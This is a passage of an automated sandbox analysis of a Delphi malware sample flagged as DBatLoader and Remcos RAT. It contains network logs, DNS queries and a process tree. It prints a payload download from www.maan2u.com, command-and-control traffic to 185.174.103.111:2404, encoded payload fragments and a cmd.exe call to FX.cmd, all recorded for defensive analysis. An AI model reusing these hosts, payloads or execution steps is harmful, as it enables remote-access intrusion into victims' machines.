                                                            Dec 19, 2024 08:02:02.682646990 CET497252404192.168.2.7185.174.103.111
                                                            Dec 19, 2024 08:02:02.802248955 CET240449725185.174.103.111192.168.2.7
                                                            Dec 19, 2024 08:02:22.342350006 CET4973680192.168.2.7178.237.33.50
                                                            Dec 19, 2024 08:02:22.732583046 CET4973680192.168.2.7178.237.33.50
                                                            Dec 19, 2024 08:02:23.435697079 CET4973680192.168.2.7178.237.33.50
                                                            Dec 19, 2024 08:02:24.732760906 CET4973680192.168.2.7178.237.33.50
                                                            Dec 19, 2024 08:02:27.232574940 CET4973680192.168.2.7178.237.33.50
                                                            Dec 19, 2024 08:02:32.232608080 CET4973680192.168.2.7178.237.33.50
                                                            Dec 19, 2024 08:02:33.015441895 CET240449725185.174.103.111192.168.2.7
                                                            Dec 19, 2024 08:02:33.020251989 CET497252404192.168.2.7185.174.103.111
                                                            Dec 19, 2024 08:02:33.140219927 CET240449725185.174.103.111192.168.2.7
                                                            Dec 19, 2024 08:02:41.920125008 CET4973680192.168.2.7178.237.33.50
                                                            Dec 19, 2024 08:03:03.414673090 CET240449725185.174.103.111192.168.2.7
                                                            Dec 19, 2024 08:03:03.432121992 CET497252404192.168.2.7185.174.103.111
                                                            Dec 19, 2024 08:03:03.551640987 CET240449725185.174.103.111192.168.2.7
                                                            Dec 19, 2024 08:03:33.774501085 CET240449725185.174.103.111192.168.2.7
                                                            Dec 19, 2024 08:03:33.783910036 CET497252404192.168.2.7185.174.103.111
                                                            Dec 19, 2024 08:03:33.903618097 CET240449725185.174.103.111192.168.2.7
                                                            Dec 19, 2024 08:04:04.086796999 CET240449725185.174.103.111192.168.2.7
                                                            Dec 19, 2024 08:04:04.088151932 CET497252404192.168.2.7185.174.103.111
                                                            Dec 19, 2024 08:04:04.207717896 CET240449725185.174.103.111192.168.2.7

                                                            UDP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Dec 19, 2024 08:00:21.470062971 CET6321053192.168.2.71.1.1.1
                                                            Dec 19, 2024 08:00:22.326508045 CET53632101.1.1.1192.168.2.7
                                                            Dec 19, 2024 08:00:32.362943888 CET5767553192.168.2.71.1.1.1
                                                            Dec 19, 2024 08:00:32.518511057 CET53576751.1.1.1192.168.2.7

                                                            DNS Queries

                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Dec 19, 2024 08:00:21.470062971 CET192.168.2.71.1.1.10xc9c4Standard query (0)www.maan2u.comA (IP address)IN (0x0001)false
                                                            Dec 19, 2024 08:00:32.362943888 CET192.168.2.71.1.1.10x8005Standard query (0)geoplugin.netA (IP address)IN (0x0001)false

                                                            DNS Answers

                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Dec 19, 2024 08:00:18.212495089 CET1.1.1.1192.168.2.70x7731No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                            Dec 19, 2024 08:00:18.212495089 CET1.1.1.1192.168.2.70x7731No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                            Dec 19, 2024 08:00:22.326508045 CET1.1.1.1192.168.2.70xc9c4No error (0)www.maan2u.commaan2u.comCNAME (Canonical name)IN (0x0001)false
                                                            Dec 19, 2024 08:00:22.326508045 CET1.1.1.1192.168.2.70xc9c4No error (0)maan2u.com103.82.231.117A (IP address)IN (0x0001)false
                                                            Dec 19, 2024 08:00:32.518511057 CET1.1.1.1192.168.2.70x8005No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false

                                                            HTTP Request Dependency Graph

                                                            • www.maan2u.com
                                                            • geoplugin.net

                                                            HTTP Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.749736178.237.33.50807920C:\Windows\SysWOW64\colorcpl.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 19, 2024 08:00:32.643743992 CET71OUTGET /json.gp HTTP/1.1
                                                            Host: geoplugin.net
                                                            Cache-Control: no-cache
                                                            Dec 19, 2024 08:00:33.886032104 CET1171INHTTP/1.1 200 OK
                                                            date: Thu, 19 Dec 2024 07:00:33 GMT
                                                            server: Apache
                                                            content-length: 963
                                                            content-type: application/json; charset=utf-8
                                                            cache-control: public, max-age=300
                                                            access-control-allow-origin: *
                                                            Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 [TRUNCATED]
                                                            Data Ascii: { "geoplugin_request":"8.46.123.189", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7503", "geoplugin_longitude":"-74.0014", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                            HTTPS Proxied Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.749710103.82.231.1174437648C:\Users\user\Desktop\SEPTobn3BR.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-12-19 07:00:24 UTC168OUTGET /docs/233_Emxwenemixg HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Accept: */*
                                                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                            Host: www.maan2u.com
                                                            2024-12-19 07:00:25 UTC365INHTTP/1.1 200 OK
                                                            Connection: close
                                                            last-modified: Tue, 17 Dec 2024 23:16:52 GMT
                                                            accept-ranges: bytes
                                                            content-length: 1129840
                                                            date: Thu, 19 Dec 2024 07:00:24 GMT
                                                            server: LiteSpeed
                                                            alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                            2024-12-19 07:00:25 UTC16384INData Raw: 70 71 36 6c 57 53 4f 6e 73 55 73 51 45 68 41 6b 44 68 77 66 46 67 34 51 45 43 45 6b 49 51 38 53 45 78 30 6a 4a 78 6b 68 46 79 45 5a 46 77 34 64 45 79 45 6b 47 42 6f 4f 48 68 51 62 44 78 4d 65 45 69 55 55 48 68 55 58 45 79 63 66 4a 52 77 63 46 43 55 6e 4a 69 41 66 47 77 34 69 46 78 34 65 49 78 51 54 44 69 63 61 48 42 51 6a 4a 42 41 52 4a 79 41 57 46 52 4d 53 4a 77 38 6e 47 51 38 6b 70 71 36 6c 57 53 4f 6e 73 55 74 51 47 69 55 6b 45 68 73 53 47 68 59 6c 46 4b 61 75 70 56 6b 6a 70 37 46 4c 77 37 33 44 7a 38 48 48 30 73 6e 42 77 38 76 48 6a 46 61 42 51 45 41 76 6a 76 68 67 36 72 30 58 49 67 4b 74 35 61 37 66 44 53 49 2b 53 73 37 41 79 55 6a 57 37 76 7a 58 76 30 6d 36 37 37 37 31 36 31 75 70 38 6d 52 4d 73 69 39 58 39 76 4f 42 56 38 49 6c 53 2f 6e 55 4b 51 75
                                                            Data Ascii: pq6lWSOnsUsQEhAkDhwfFg4QECEkIQ8SEx0jJxkhFyEZFw4dEyEkGBoOHhQbDxMeEiUUHhUXEycfJRwcFCUnJiAfGw4iFx4eIxQTDicaHBQjJBARJyAWFRMSJw8nGQ8kpq6lWSOnsUtQGiUkEhsSGhYlFKaupVkjp7FLw73Dz8HH0snBw8vHjFaBQEAvjvhg6r0XIgKt5a7fDSI+Ss7AyUjW7vzXv0m6777161up8mRMsi9X9vOBV8IlS/nUKQu
                                                            2024-12-19 07:00:25 UTC16384INData Raw: 47 2b 6a 77 35 72 6a 67 77 39 39 77 37 6e 7a 6b 6d 2f 42 4f 35 31 58 66 57 74 78 62 33 74 37 70 38 39 2f 65 38 30 62 6d 4d 64 34 79 2b 37 6a 79 4b 4f 63 6f 37 4f 62 75 78 4d 36 2f 76 6a 2f 61 78 4a 65 2f 45 35 63 67 55 78 4a 36 49 57 63 6f 62 42 53 42 46 49 46 62 69 43 73 49 4b 31 6b 70 37 68 77 7a 4b 54 51 72 2f 42 63 6c 57 79 63 6f 46 68 6a 78 48 76 6f 6b 74 68 36 66 4b 61 41 6f 71 68 66 4c 48 73 63 61 7a 78 2f 58 4a 33 45 6d 63 79 68 67 49 58 45 6e 6d 78 75 55 49 49 41 6f 68 52 4e 2b 48 50 38 66 56 52 59 4a 47 6c 67 58 44 53 66 37 45 2f 41 67 4c 68 64 49 57 7a 77 54 4f 69 49 56 4a 78 73 54 49 52 4d 64 4b 2b 39 62 35 31 75 76 4b 70 30 62 6e 43 71 34 57 38 30 5a 30 43 62 4f 4b 73 73 61 76 79 52 78 48 70 63 6b 55 79 63 47 4b 6b 63 5a 45 53 50 65 46 2b 55
                                                            Data Ascii: G+jw5rjgw99w7nzkm/BO51XfWtxb3t7p89/e80bmMd4y+7jyKOco7ObuxM6/vj/axJe/E5cgUxJ6IWcobBSBFIFbiCsIK1kp7hwzKTQr/BclWycoFhjxHvokth6fKaAoqhfLHscazx/XJ3EmcyhgIXEnmxuUIIAohRN+HP8fVRYJGlgXDSf7E/AgLhdIWzwTOiIVJxsTIRMdK+9b51uvKp0bnCq4W80Z0CbOKssavyRxHpckUycGKkcZESPeF+U
                                                            2024-12-19 07:00:25 UTC16384INData Raw: 30 34 7a 48 77 51 6d 56 76 64 58 46 77 38 36 38 76 63 50 50 76 73 66 53 79 62 37 44 77 38 7a 51 7a 4d 4b 39 77 64 44 4f 32 73 76 4d 79 73 7a 4c 79 73 48 51 77 63 7a 50 79 38 72 42 30 62 2f 4a 77 72 37 52 77 74 69 2f 30 63 66 4b 76 74 72 4e 32 4d 66 48 77 4e 6a 61 32 63 7a 53 78 73 48 53 79 74 48 52 30 62 2b 2b 77 64 58 46 78 37 2f 52 7a 38 4f 38 31 64 50 4a 79 4d 47 39 32 73 4c 56 78 4d 4c 50 76 4c 33 43 7a 37 37 48 74 73 6d 2b 73 6b 57 6b 30 44 4f 49 35 38 45 32 6c 76 50 4c 71 43 58 4f 79 38 71 72 30 4d 48 4f 2b 4d 72 4b 6f 54 47 76 79 62 42 4a 71 4d 4c 72 4d 4b 50 48 74 52 32 64 7a 64 69 32 78 38 41 72 6c 37 33 4d 30 70 4f 2b 7a 63 72 52 30 63 36 2f 76 73 48 61 78 63 65 2f 7a 73 2f 44 76 4e 72 54 79 63 69 2b 76 64 72 43 32 73 54 43 7a 38 4f 39 77 38 2b
                                                            Data Ascii: 04zHwQmVvdXFw868vcPPvsfSyb7Dw8zQzMK9wdDO2svMyszLysHQwczPy8rB0b/Jwr7Rwti/0cfKvtrN2MfHwNja2czSxsHSytHR0b++wdXFx7/Rz8O81dPJyMG92sLVxMLPvL3Cz77Htsm+skWk0DOI58E2lvPLqCXOy8qr0MHO+MrKoTGvybBJqMLrMKPHtR2dzdi2x8Arl73M0pO+zcrR0c6/vsHaxce/zs/DvNrTyci+vdrC2sTCz8O9w8+
                                                            2024-12-19 07:00:25 UTC16384INData Raw: 79 72 37 61 30 74 6a 48 78 37 2f 59 32 74 6e 54 30 73 62 42 30 73 70 54 79 74 48 6d 34 4f 76 56 6e 7a 53 33 30 62 4d 34 73 4e 57 74 4f 4c 58 42 4b 67 47 71 31 62 4d 6e 7a 62 7a 71 45 5a 32 2b 36 56 4b 63 76 76 48 73 6f 74 43 33 34 4b 58 42 30 41 6a 56 78 4d 7a 4b 7a 4d 54 4b 77 64 43 2b 7a 4d 2f 4c 78 63 48 52 76 38 6e 43 44 4d 72 43 44 56 73 57 78 38 71 31 32 73 32 63 48 63 54 41 32 50 72 5a 7a 4e 4c 32 77 64 4c 4b 72 4e 48 52 76 35 37 42 31 63 58 67 76 39 48 50 75 72 7a 56 75 71 43 68 77 62 30 45 76 64 72 45 77 73 2f 44 76 63 50 50 77 63 66 53 79 63 48 44 77 38 7a 51 7a 41 6a 57 77 51 30 57 46 38 76 4d 79 73 7a 4c 48 31 65 36 77 66 52 5a 6e 73 71 73 47 72 6e 4a 36 67 75 31 77 76 49 50 74 63 66 67 43 71 7a 4e 32 4d 66 48 77 4c 47 73 73 4d 7a 53 54 72 37
                                                            Data Ascii: yr7a0tjHx7/Y2tnT0sbB0spTytHm4OvVnzS30bM4sNWtOLXBKgGq1bMnzbzqEZ2+6VKcvvHsotC34KXB0AjVxMzKzMTKwdC+zM/LxcHRv8nCDMrCDVsWx8q12s2cHcTA2PrZzNL2wdLKrNHRv57B1cXgv9HPurzVuqChwb0EvdrEws/DvcPPwcfSycHDw8zQzAjWwQ0WF8vMyszLH1e6wfRZnsqsGrnJ6gu1wvIPtcfgCqzN2MfHwLGssMzSTr7
                                                            2024-12-19 07:00:25 UTC16384INData Raw: 7a 4d 4b 39 76 74 44 4f 32 73 54 4d 79 73 7a 45 79 73 48 51 76 73 7a 50 79 38 58 42 30 62 2f 47 77 72 37 52 76 64 69 2f 30 63 6a 4b 76 74 72 53 32 4d 66 48 76 39 6a 61 32 64 50 53 78 73 48 4e 79 74 48 52 7a 72 2b 2b 77 64 72 46 78 37 2f 4f 7a 38 4f 38 32 74 50 4a 79 4c 36 39 32 73 4c 61 78 4d 4c 50 77 37 33 44 7a 38 48 48 30 73 6e 42 77 38 50 4d 7a 38 7a 43 76 62 37 51 7a 74 72 45 7a 4d 72 4d 78 4d 72 42 30 4c 37 4d 7a 38 76 46 77 64 47 2f 78 73 4b 2b 30 62 33 59 76 39 48 49 79 72 37 61 30 74 6a 48 78 37 2f 59 32 74 6e 54 30 73 62 42 7a 63 72 52 30 63 36 2f 76 73 48 61 78 63 65 2f 7a 73 2f 44 76 4e 72 54 79 63 69 2b 76 64 72 43 32 73 54 43 7a 38 4f 39 77 38 2f 42 78 39 4c 4a 77 63 50 44 7a 4d 2f 4d 77 72 32 2b 30 4d 37 61 78 4d 7a 4b 7a 4d 54 4b 77 64 43
                                                            Data Ascii: zMK9vtDO2sTMyszEysHQvszPy8XB0b/Gwr7Rvdi/0cjKvtrS2MfHv9ja2dPSxsHNytHRzr++wdrFx7/Oz8O82tPJyL692sLaxMLPw73Dz8HH0snBw8PMz8zCvb7QztrEzMrMxMrB0L7Mz8vFwdG/xsK+0b3Yv9HIyr7a0tjHx7/Y2tnT0sbBzcrR0c6/vsHaxce/zs/DvNrTyci+vdrC2sTCz8O9w8/Bx9LJwcPDzM/Mwr2+0M7axMzKzMTKwdC
                                                            2024-12-19 07:00:25 UTC16384INData Raw: 78 63 65 2f 7a 73 2f 44 76 4e 72 54 79 63 69 2b 76 64 72 43 32 73 54 43 7a 38 4f 39 77 38 2f 42 78 39 4c 4a 77 63 50 44 7a 4d 2f 4d 77 72 32 2b 30 4d 37 61 78 4d 7a 4b 7a 4d 54 4b 77 64 43 2b 7a 4d 2f 4c 78 63 48 52 76 38 62 43 76 74 47 39 32 4c 2f 52 79 4d 71 2b 32 74 4c 59 78 38 65 2f 32 4e 72 5a 30 39 4c 47 77 63 33 4b 30 64 48 4f 76 37 37 42 32 73 58 48 76 38 37 50 77 37 7a 61 30 38 6e 49 76 72 33 61 77 74 72 45 77 73 2f 44 76 63 50 50 77 63 66 53 79 63 48 44 77 38 7a 50 7a 4d 4b 39 76 74 44 4f 32 73 54 4d 79 73 7a 45 79 73 48 51 76 73 7a 50 79 38 58 42 30 62 2f 47 77 72 37 52 76 64 69 2f 30 63 6a 4b 76 74 72 53 32 4d 66 48 76 39 6a 61 32 64 50 53 78 73 48 4e 79 74 48 52 7a 72 2b 2b 77 64 72 46 78 37 2f 4f 7a 38 4f 38 32 74 50 4a 79 4c 36 39 32 73 4c
                                                            Data Ascii: xce/zs/DvNrTyci+vdrC2sTCz8O9w8/Bx9LJwcPDzM/Mwr2+0M7axMzKzMTKwdC+zM/LxcHRv8bCvtG92L/RyMq+2tLYx8e/2NrZ09LGwc3K0dHOv77B2sXHv87Pw7za08nIvr3awtrEws/DvcPPwcfSycHDw8zPzMK9vtDO2sTMyszEysHQvszPy8XB0b/Gwr7Rvdi/0cjKvtrS2MfHv9ja2dPSxsHNytHRzr++wdrFx7/Oz8O82tPJyL692sL
                                                            2024-12-19 07:00:25 UTC16384INData Raw: 77 72 37 52 76 64 69 2f 30 63 6a 4b 76 74 72 53 32 4d 66 48 76 39 6a 61 32 64 50 53 78 73 48 4e 79 74 48 52 7a 72 2b 2b 77 64 72 46 78 37 2f 4f 7a 38 4f 38 32 74 50 4a 79 4c 36 39 32 73 4c 61 78 4d 4c 50 77 37 33 44 7a 38 48 48 30 73 6e 42 77 38 50 4d 7a 38 7a 43 76 62 37 51 7a 74 72 45 7a 4d 72 4d 78 4d 72 42 30 4c 37 4d 7a 38 76 46 77 64 47 2f 78 73 4b 2b 30 62 33 59 76 39 48 49 79 72 37 61 30 74 6a 48 78 37 2f 59 32 74 6e 54 30 73 62 42 7a 63 72 52 30 63 36 2f 76 73 48 61 78 63 65 2f 7a 73 2f 44 76 4e 72 54 79 63 69 2b 76 64 72 43 32 73 54 43 7a 38 4f 39 77 38 2f 42 78 39 4c 4a 77 63 50 44 7a 4d 2f 4d 77 72 32 2b 30 4d 37 61 78 4d 7a 4b 7a 4d 54 4b 77 64 43 2b 7a 4d 2f 4c 78 63 48 52 76 38 62 43 76 74 47 39 32 4c 2f 52 79 4d 71 2b 32 74 4c 59 78 38 65
                                                            Data Ascii: wr7Rvdi/0cjKvtrS2MfHv9ja2dPSxsHNytHRzr++wdrFx7/Oz8O82tPJyL692sLaxMLPw73Dz8HH0snBw8PMz8zCvb7QztrEzMrMxMrB0L7Mz8vFwdG/xsK+0b3Yv9HIyr7a0tjHx7/Y2tnT0sbBzcrR0c6/vsHaxce/zs/DvNrTyci+vdrC2sTCz8O9w8/Bx9LJwcPDzM/Mwr2+0M7axMzKzMTKwdC+zM/LxcHRv8bCvtG92L/RyMq+2tLYx8e
                                                            2024-12-19 07:00:25 UTC16384INData Raw: 45 34 62 71 77 52 65 58 54 38 38 71 6c 76 69 2b 30 4d 36 66 78 4d 7a 4b 7a 63 54 4b 77 64 43 2b 4b 6f 73 74 78 52 58 4b 44 4d 62 43 76 74 47 39 32 4c 2f 52 79 4d 71 2b 32 74 49 65 6b 37 65 2f 32 4e 6f 58 30 39 4c 47 77 64 4c 46 7a 73 37 4f 76 37 37 42 32 73 58 48 76 4d 34 72 32 44 6a 61 30 38 6e 49 76 68 6b 4a 79 74 6f 53 54 79 58 44 47 56 43 54 77 52 4f 47 36 73 45 58 6c 36 7a 50 7a 4d 4b 35 76 74 44 4f 32 38 54 4d 79 73 7a 45 45 4a 57 67 76 69 72 45 4c 63 58 42 30 62 2f 47 77 72 37 52 76 64 69 2f 30 63 67 51 54 4a 62 53 32 4d 63 70 76 39 6a 61 32 63 7a 4e 79 62 37 4e 79 74 48 52 7a 72 2b 2b 77 74 6f 52 7a 42 33 4f 7a 38 4f 38 32 69 64 61 77 4c 34 5a 43 52 72 61 45 6b 2b 54 77 78 6c 50 62 38 45 54 41 6e 58 42 77 38 4f 6f 7a 38 7a 43 76 4c 37 51 7a 74 72
                                                            Data Ascii: E4bqwReXT88qlvi+0M6fxMzKzcTKwdC+KostxRXKDMbCvtG92L/RyMq+2tIek7e/2NoX09LGwdLFzs7Ov77B2sXHvM4r2Dja08nIvhkJytoSTyXDGVCTwROG6sEXl6zPzMK5vtDO28TMyszEEJWgvirELcXB0b/Gwr7Rvdi/0cgQTJbS2Mcpv9ja2czNyb7NytHRzr++wtoRzB3Oz8O82idawL4ZCRraEk+TwxlPb8ETAnXBw8Ooz8zCvL7Qztr
                                                            2024-12-19 07:00:25 UTC16384INData Raw: 79 74 48 52 7a 72 2b 2b 77 64 72 46 78 37 2f 4f 7a 38 4f 38 32 74 50 4a 79 4c 36 39 32 73 4c 61 78 4d 4c 50 77 37 33 44 7a 38 48 48 30 73 6e 42 77 38 50 4d 7a 38 7a 43 76 62 37 51 7a 74 6f 53 4b 68 41 71 45 68 41 56 4a 68 77 71 4b 77 38 52 46 53 55 62 45 78 67 63 4a 52 6b 65 47 79 55 4f 45 42 77 67 4b 42 34 54 45 78 73 65 49 42 30 6e 4b 42 51 56 4b 52 41 6c 4a 56 73 62 48 42 58 61 78 63 65 2f 7a 73 2f 44 33 4c 6e 79 49 75 69 66 49 42 39 46 32 73 54 43 7a 73 4f 39 77 37 66 42 78 39 4c 49 77 63 50 44 6c 4d 2f 4d 77 72 69 2b 30 4d 37 61 78 4b 54 4b 71 42 62 67 77 64 43 2b 7a 4d 2f 4c 78 63 48 52 76 38 62 43 76 74 47 39 32 4c 2f 52 79 4d 71 2b 32 74 4c 59 78 38 65 2f 32 4e 72 5a 30 39 4c 47 77 63 33 4b 30 64 48 4f 76 37 37 42 32 73 58 48 76 38 37 50 77 37 7a
                                                            Data Ascii: ytHRzr++wdrFx7/Oz8O82tPJyL692sLaxMLPw73Dz8HH0snBw8PMz8zCvb7QztoSKhAqEhAVJhwqKw8RFSUbExgcJRkeGyUOEBwgKB4TExseIB0nKBQVKRAlJVsbHBXaxce/zs/D3LnyIuifIB9F2sTCzsO9w7fBx9LIwcPDlM/Mwri+0M7axKTKqBbgwdC+zM/LxcHRv8bCvtG92L/RyMq+2tLYx8e/2NrZ09LGwc3K0dHOv77B2sXHv87Pw7z
                                                            2024-12-19 07:00:25 UTC16384INData Raw: 59 4f 67 4c 6d 50 59 2b 79 61 62 64 78 44 59 59 65 37 78 52 6c 4d 42 47 67 61 30 47 46 4e 59 6d 67 30 56 69 47 2f 52 49 56 72 65 64 68 5a 4c 68 49 44 64 45 75 4d 47 51 6e 68 7a 50 77 37 79 78 30 38 6e 49 44 37 33 61 77 68 62 45 77 73 2b 6a 76 63 50 50 73 63 66 53 79 62 6e 44 77 38 79 72 7a 4d 4b 39 76 4e 44 4f 32 73 58 4d 79 73 7a 45 79 73 48 71 4f 45 55 37 4c 45 45 32 35 44 77 78 4e 7a 68 4b 2b 45 6f 34 46 4b 67 34 4e 39 31 41 50 66 4f 6e 35 50 72 33 2b 62 4d 31 44 6b 50 4e 79 74 48 52 53 54 51 34 4e 54 63 31 38 70 2f 71 52 61 4d 33 32 74 50 4a 79 44 6b 32 50 44 51 33 4e 76 65 76 4d 54 36 6a 53 73 48 48 73 75 76 68 39 79 33 70 7a 30 67 7a 2b 6a 4e 43 52 7a 37 45 53 44 72 71 70 43 30 36 52 6a 67 74 4f 2b 37 46 77 64 48 31 4d 44 63 73 52 6b 6b 39 2b 6a 4c
                                                            Data Ascii: YOgLmPY+yabdxDYYe7xRlMBGga0GFNYmg0ViG/RIVredhZLhIDdEuMGQnhzPw7yx08nID73awhbEws+jvcPPscfSybnDw8yrzMK9vNDO2sXMyszEysHqOEU7LEE25DwxNzhK+Eo4FKg4N91APfOn5Pr3+bM1DkPNytHRSTQ4NTc18p/qRaM32tPJyDk2PDQ3NvevMT6jSsHHsuvh9y3pz0gz+jNCRz7ESDrqpC06RjgtO+7FwdH1MDcsRkk9+jL


                                                            Statistics

                                                            CPU Usage

                                                            Click to jump to process

                                                            Memory Usage

                                                            Click to jump to process

                                                            High Level Behavior Distribution

                                                            Click to dive into process behavior distribution

                                                            Behavior

                                                            Click to jump to process

                                                            System Behavior

                                                            General

                                                            Target ID:0
                                                            Start time:02:00:19
                                                            Start date:19/12/2024
                                                            Path:C:\Users\user\Desktop\SEPTobn3BR.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\SEPTobn3BR.exe"
                                                            Imagebase:0x400000
                                                            File size:1'362'944 bytes
                                                            MD5 hash:CCDCD04A0FFDE31366754018598EB02F
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:Borland Delphi
                                                            Yara matches:
                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000002.1421740936.00000000022C6000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000003.1334500441.000000007FB00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000002.1452056215.000000007FBD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.1449264347.000000007E8E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.1449264347.000000007E8E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                            Reputation:low
                                                            Has exited:true

                                                            General

                                                            Target ID:3
                                                            Start time:02:00:26
                                                            Start date:19/12/2024
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                                                            Imagebase:0x410000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:4
                                                            Start time:02:00:26
                                                            Start date:19/12/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff75da10000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:5
                                                            Start time:02:00:27
                                                            Start date:19/12/2024
                                                            Path:C:\Windows\SysWOW64\colorcpl.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\System32\colorcpl.exe
                                                            Imagebase:0x970000
                                                            File size:86'528 bytes
                                                            MD5 hash:DB71E132EBF1FEB6E93E8A2A0F0C903D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.3812934475.00000000313BF000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.3812571420.00000000311A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.3812685840.00000000311F0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000003.2755366865.00000000311F0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.3812571420.00000000311CA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
